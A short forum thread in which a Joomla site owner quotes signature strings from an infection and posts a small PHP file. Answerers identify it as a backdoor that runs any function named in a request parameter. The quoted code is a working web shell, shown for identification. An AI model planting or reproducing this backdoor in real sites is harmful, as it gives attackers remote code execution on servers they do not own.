S
S
SunHere2015-01-17 14:10:32
Malware
SunHere, 2015-01-17 14:10:32

Is the following code malicious?

Greetings, there are viruses on Joomla, I found all files with signatures

$qV="stop_"; , $sF="PCT4BA6ODSE_", isset($_REQUEST ,return base64_decode(, eval(
.. But next to the malware, I caught the eye of such a file.
<?php
if (isset($_REQUEST[id_polls])) {
     stripslashes($_REQUEST[fun]($_REQUEST[id_polls]));
   exit();
}
echo "Good day!!!<br>";
?>

I don't know if it can hurt or not?

Answer the question

In order to leave comments, you need to log in

2 answer(s)
S
Sergey, 2015-01-17
@begemot_sun

Yes maybe.
The code calls any function whose name is in $_REQUEST[fun] with the parameter $_REQUEST[id_polls]

G
globuser, 2015-01-17
@globuzer

BIOHAZARD WARNING, ACHTUNG!

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question